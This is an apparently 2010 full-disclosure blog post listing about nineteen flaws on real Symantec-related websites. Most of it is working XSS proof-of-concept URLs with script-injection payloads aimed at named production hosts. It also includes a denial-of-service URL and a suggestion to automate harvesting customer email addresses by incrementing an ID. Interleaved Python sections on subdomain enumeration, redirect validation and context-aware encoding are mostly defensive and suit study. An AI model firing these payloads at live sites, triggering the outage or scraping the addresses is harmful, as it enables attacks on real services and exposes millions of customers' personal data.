Full Disclosure about 20 XSS bugs on Symantec.com and related domains

2010/09/03

Martin Hall

http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/



I have written a new tool called SubFinder (provisional name subject to change).

It does exactly what the name suggests: it finds subdomains of any given host. It does this via a few methods: first it looks in a couple of obvious places, and then it bruteforces the rest.
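As an added illustration of that two-step approach (seed names from the obvious places first, then a wordlist bruteforce), here is a small Python sketch. It is example code written for this page, not SubFinder's own source, and it runs offline against a constructed example.com zone; the `system_resolver` function is the only piece that would touch real DNS. It also handles the one thing that makes naive bruteforcing useless, a wildcard record, by resolving a random label first and discarding every answer that matches it.

```python
import random
import socket
import string
from typing import Callable, Dict, Iterable, Optional

# A resolver maps a hostname to an IPv4 string, or None when the name does not exist.
Resolver = Callable[[str], Optional[str]]


def system_resolver(name: str) -> Optional[str]:
    """Live resolver through the OS stub resolver; the sample run below does not use it."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def wildcard_ip(domain: str, resolve: Resolver) -> Optional[str]:
    """Check for wildcard DNS: if a random label resolves, every bruteforced name will 'exist'."""
    label = "".join(random.choices(string.ascii_lowercase, k=24))
    return resolve(f"{label}.{domain}")


def enumerate_subdomains(domain: str, wordlist: Iterable[str], resolve: Resolver,
                         seeds: Iterable[str] = ()) -> Dict[str, str]:
    """Step 1: try the 'obvious places' (seeds: names scraped from pages, certificates, etc.).
    Step 2: bruteforce the wordlist. Answers equal to the wildcard IP are dropped as noise."""
    wildcard = wildcard_ip(domain, resolve)
    # dict.fromkeys keeps order while removing seeds that the wordlist would repeat.
    candidates = list(dict.fromkeys(list(seeds) + [f"{word}.{domain}" for word in wordlist]))
    found: Dict[str, str] = {}
    for name in candidates:
        ip = resolve(name)
        if ip is None or ip == wildcard:
            continue
        found[name] = ip
    return found


# Constructed sample zone (example.com, not real records) so the run works offline.
SAMPLE_ZONE = {
    "www.example.com": "192.0.2.10",
    "chat.example.com": "192.0.2.11",
    "careers.example.com": "192.0.2.12",
}
SAMPLE_WORDLIST = ["www", "chat", "careers", "mail", "renewalcenter"]


def plain_resolver(name: str) -> Optional[str]:
    """Constructed resolver for a zone without a wildcard record."""
    return SAMPLE_ZONE.get(name)


def wildcard_resolver(name: str) -> Optional[str]:
    """Constructed resolver for the same zone plus '*.example.com -> 192.0.2.99'."""
    if name in SAMPLE_ZONE:
        return SAMPLE_ZONE[name]
    return "192.0.2.99" if name.endswith(".example.com") else None


if __name__ == "__main__":
    for label, resolver in (("plain", plain_resolver), ("wildcard", wildcard_resolver)):
        print(label, enumerate_subdomains("example.com", SAMPLE_WORDLIST, resolver,
                                          seeds=["www.example.com"]))
```

Without the wildcard check the second resolver would report mail and renewalcenter as live hosts; with it both runs return only the three real names. Against a real target, swap `plain_resolver` for `system_resolver` and a proper wordlist.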

It will be released in the next couple of days.

I wanted to test it, so I ran it against Symantec.com.

It found over 200 subdomains (not all could be browsed, but loads could).

From the domain list I thought I would check some of them over for XSS issues. The reason you will find more issues here is that, firstly, these subdomains are usually used to host mini sites or sub sites; when (or if) there is a code review, these can be missed.

Also, subdomains are more often than not coded by outsourced suppliers, so even if Symantec had great processes in place (which they don't), there is a chance that the outsourced suppliers do not.

(1) https://symantecenterprise.rsys3.net XSS

(2) Symantec Connect Search Feature XSS (May only work in IE?)

(3) https://et.symantec.com XSS

(4) http://maillist.entsupport.symantec.com XSS

(5) Bit of a strange one, this: if you go to https://renewalcenter.symantec.com/
and into the email box type
"><</div><script>alert('The TestManager SymanTec Xss SubFinderTest')</script>
you should get an error which states an invalid email address was entered.
Now change the URL to
https://renewalcenter.symantec.com
and bingo, XSS (is it being stored, making it a stored XSS?
I don't think so, but not 100% sure).

(6) http://www.symantec.com/ XSS (IE browsers only?)

(7) open redirect to XSS: http://www.messagelabs.co.uk/ XSS
(seems to only work in Firefox, and not in IE?)

(8) http://www.symantec.com/ Connect Forward XSS
IE only?

(9) https://symantecevents.verite.com XSS
Site development on the above seems to have been outsourced to
http://verite.com/our-work/by-client/client-focus/?client_id=2
I'm guessing all of their sites for Symantec would be easy targets.

(10) http://seer.entsupport.symantec.com/ XSS

(11) https://symantecevents.verite.com event cancel XSS

(12) http://aka-community.symantec.com XSS

(13) https://careers.symantec.com/ XSS (may need to visit the page twice, as the
first visit sets the cookie)

(14) https://chat.symantec.com XSS

(15) https://www4.symantec.com/ XSS

(16) http://seer.entsupport.symantec.com/ Navbar XSS

(17) Ouch: Denial of Service (DoS) via bad parameter injection.
http://techcenter.symantec.com redirects to http://techcenter.symantec.com/ecampus/enterprise,
which works fine, as do all other URLs on this techcenter subdomain.
However, if I now use the URL
http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
then every URL on that subdomain gets blown and the server responds with an HTTP 500 server error. This creates a denial of service on that subdomain.

(18) http://cybercrimenews.norton.com XSS

(19) Every Symantec customer email address can be grabbed: http://bit.ly/91fZrT, just change the id. You could start at 1 and work your way up. This is very easy to automate. Looks like over 16 million potential email addresses?
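Finding (7) is the one that is not a plain reflection bug: the `link=` parameter on messagelabs.co.uk is used as a redirect destination, and a `javascript:` URL in it runs in the page. The Python below is an added example (not messagelabs' or Symantec's code) of the check such a redirect parameter needs; `SITE_HOST` and `www.example.com` are assumptions standing in for the real site. It accepts only same-site http(s) targets and rebuilds them as a root-relative path, so scheme tricks (`javascript:`, `JaVa<tab>ScRiPt:`), backslash and protocol-relative `//host` forms all fall back to the default.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumption: the site's own host, standing in for www.messagelabs.co.uk in the post.
SITE_HOST = "www.example.com"


def weak_redirect_target(link: str) -> str:
    """The behaviour behind finding (7): whatever ?link= says becomes the destination."""
    return link


def safe_redirect_target(link: str, default: str = "/") -> str:
    """Accept only same-site http(s) targets and rebuild them as a root-relative path."""
    # Browsers ignore tabs, newlines and leading/trailing spaces inside a scheme, so
    # "java\tscript:" must be judged with them removed; they also treat "\" like "/".
    compact = "".join(ch for ch in link if ord(ch) > 0x20).replace("\\", "/")
    try:
        parts = urlsplit(compact)
    except ValueError:            # malformed netloc (bad IPv6 brackets etc.)
        return default
    if parts.scheme not in ("", "http", "https"):
        return default            # javascript:, data:, vbscript:, ...
    if parts.netloc and parts.hostname != SITE_HOST:
        return default            # off-site host, including user@host tricks
    # Collapse leading slashes: "//evil" or "////evil" must not become scheme-relative.
    path = "/" + parts.path.lstrip("/")
    return urlunsplit(("", "", path, parts.query, parts.fragment))


if __name__ == "__main__":
    for link in ("javascript:alert(1)", "JaVa\tScRiPt:alert(1)", "//evil.example/",
                 "\\\\evil.example/", "http://www.example.com@evil.example/",
                 "http://www.example.com/resources/blog.aspx?id=3", "resources/blog.aspx"):
        print(f"{link!r:55} weak={weak_redirect_target(link)!r:45} "
              f"safe={safe_redirect_target(link)!r}")
```

Rebuilding the path rather than echoing the validated input is the part that matters: it means the only thing that can ever reach the Location header or href is `/something` on the site itself.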

(1)

https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=qqqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+States+of+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq%40aaa&COMPANYSIZE=1+to+10&QUESTION=0659ttm</textarea> <br /><script>alert('The TestManager SymanTec Xss SubFinder Test')</script>&button=Submit&_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&_EMailFields_=EMAIL&_RealFields_=&_IntegerFields_=&_BannedFields_=TRUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=true&_Sent_=2010-08-23+16%3A19%3A41.610&ACTIVITYCODE=92078&EMail_=92078&__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDDEN_FIELD_NAMES__

(2)

http://www.symantec.com/connect/search?filters=01a1ttm--");</script><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>

(3) https://et.symantec.com/signup/thanks.html?fn=ttm</div><script>alert('The TestManager SymanTec Xss SubFinderTest')</script>&em=aaaa@aaa.c

(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm--"></form><script>alert('The Test Manager.com Sub Finder Symantec Test')</script>&EmailAddress=&password=

(5) Bit of a strange one, this: if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&_requestid=99999
and into the email box type
"><</div><script>alert('The TestManager SymanTec Xss SubFinderTest')</script>
you should get an error which states an invalid email address was entered.
Now change the URL to

https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&success=yes&_requestid=99999

and bingo, XSS (is it being stored, making it a stored XSS? I don't think so, but not 100% sure).

(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm"/><script>alert('The TestManager SymanTec Xss SubFinderTest')</script>&ddProduct=&pid=&content=all

(7) open redirect to XSS: http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert('The Test Manager Sub Finder Symantec XSS Test') (seems to only work in Firefox, and not in IE?)

(8) http://www.symantec.com/connect/forward?path=2e6fttm--");</script><script>alert('The Test Manager XSS Test for Sub FInder')</script>

(9)

https://symantecevents.verite.com/?action=main.dsp_register&error=42f2ttm--</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
Site development on the above seems to have been outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2. I'm guessing all of their sites for Symantec would be easy targets.

(10)

http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&SrvURL=&type=10&strName=a&strEmail=ttm--%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%3E&topic=symantec&strBODY=aaa&submit2=Send

(11)

https://symantecevents.verite.com/?action=event.dsp_cancel&event_id=17895&error=ttm--</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>test

(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&ct=us&segment=ttm--");</script><script>alert('The Test Manager Xss Test using Sub Finder on Symantec')</script>

(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm--";</script><script>alert('the test manager xss test of sub finder on Symantec')</script>test& (may need to visit the page twice, as the first visit sets the cookie)

(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm--"><script>alert('XSS TEST')</script>&lg=en&noqcode=

(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm--"><script>alert('The Test Manager Subfinder Xss Symantec')</script>&PASSWD=a&CONFIRM_PASSWD=a&a_id=48182&s_id=70&p_id=null&COMMAND_DESTINATION_URL=null&REDIRECT_PAGE=null&p_locale=en_US&l_id=&article_title=Results&t_id=62243672&t_s=1283128779469&EMAIL_AS_USER_FLAG=Y&FRM_ACTION=Create+Account&ru=null

(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E

(17) Ouch: DoS via bad parameter injection. http://techcenter.symantec.com redirects to http://techcenter.symantec.com/ecampus/enterprise, which works fine, as do all other URLs on this techcenter subdomain.
However, if I now use the URL http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
then every URL on that subdomain gets blown and the server responds with an HTTP 500 server error. This creates a denial of service on that subdomain.

(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm"><script>alert('The Test Manager XSS Sub Finder Tool Test')</script>&rule=any&page=2
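The payloads above are not interchangeable: each one is shaped by where the parameter lands in the page. `</textarea>` closes the box the rsys3 form echoes `QUESTION=` into (1), `">` ends an attribute value (4, 6, 14, 15, 16, 18), `</div>` ends a block the error text sits in (3, 9, 11), and `");</script>` ends a string literal and the script block around it (2, 8, 12, 13). The Python below is an added example, written for this page and not taken from any of the sites, that models those four contexts with constructed templates, shows the canary-plus-special-characters probe a scanner sends first, and puts the vulnerable verbatim reflection next to the encoding that closes each hole. The templates, the `ttm7f3q` canary and the sample values are all constructed.

```python
import html
import json

CANARY = "ttm7f3q"          # constructed marker, in the style of the post's "xxxxttm" prefixes
PROBE_CHARS = '"\'<>'       # the characters whose verbatim reflection makes a context breakable
MARKER = "<script>alert(1)</script>"

# Constructed templates for the four reflection contexts the post's payloads target.
TEMPLATES = {
    "html_body": '<div class="msg">{v}</div>',                 # e.g. fn= on et.symantec.com, error= on verite
    "attribute": '<input type="text" name="q" value="{v}"/>',  # e.g. ddProduct=, SearchTerm=, target=
    "textarea":  '<textarea name="QUESTION">{v}</textarea>',   # e.g. QUESTION= on rsys3.net
    "js_string": '<script>var q = "{v}";</script>',            # e.g. filters= and path= on /connect/
}

# Minimal break-out for each context, mirroring the shapes of the post's payloads.
BREAKOUTS = {
    "html_body": "</div>" + MARKER,
    "attribute": '">' + MARKER,
    "textarea":  "</textarea>" + MARKER,
    "js_string": '");</script>' + MARKER,
}


def reflect_raw(context: str, value: str) -> str:
    """The vulnerable behaviour: the parameter is inserted verbatim."""
    return TEMPLATES[context].format(v=value)


def reflect_encoded(context: str, value: str) -> str:
    """The hardened behaviour: encode for the context the value lands in."""
    if context == "js_string":
        # JSON-escape, then neutralise '<' and '>' so '</script>' can never appear in the literal.
        s = json.dumps(value)[1:-1]
        s = s.replace("<", "\\u003c").replace(">", "\\u003e")
    else:
        # HTML-encode; quote=True also covers the attribute context.
        s = html.escape(value, quote=True)
    return TEMPLATES[context].format(v=s)


def unencoded_survivors(body: str, canary: str) -> str:
    """Which probe characters came back verbatim after the canary (what a scanner checks first).
    A survivor only matters if it is the delimiter of the context it landed in."""
    p = body.find(canary)
    if p < 0:
        return ""
    p += len(canary)
    out = ""
    for ch in PROBE_CHARS:
        if p >= len(body):
            break
        if body[p] == ch:
            out += ch
            p += 1
        elif body[p] == "&":                       # HTML entity such as &quot; or &lt;
            semi = body.find(";", p)
            if semi < 0:
                break
            p = semi + 1
        elif body[p] == "\\" and p + 1 < len(body):  # JS escape such as \" or \u003c
            p += 6 if body[p + 1] == "u" else 2
        else:
            break                                  # reflection ended or character stripped
    return out


def exploitable(context: str, reflect) -> bool:
    """True when the context's break-out lands a live script tag in the page."""
    return MARKER in reflect(context, BREAKOUTS[context])


if __name__ == "__main__":
    probe = CANARY + PROBE_CHARS
    for ctx in TEMPLATES:
        print(f"{ctx:10} raw: survivors={unencoded_survivors(reflect_raw(ctx, probe), CANARY)!r:7}"
              f" exploitable={exploitable(ctx, reflect_raw)}"
              f" | encoded: survivors={unencoded_survivors(reflect_encoded(ctx, probe), CANARY)!r:5}"
              f" exploitable={exploitable(ctx, reflect_encoded)}")
```

Two things worth noticing in the output. First, every one of the post's contexts is broken by verbatim reflection and closed by encoding chosen for that context; one generic filter would not do, which is why a payload that works in a `<script>` string fails in an attribute and vice versa. Second, in the encoded JS-string case the single quote still comes back verbatim, and that is fine: it is not the delimiter there, so the survivor list has to be read against the context rather than treated as a finding on its own.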

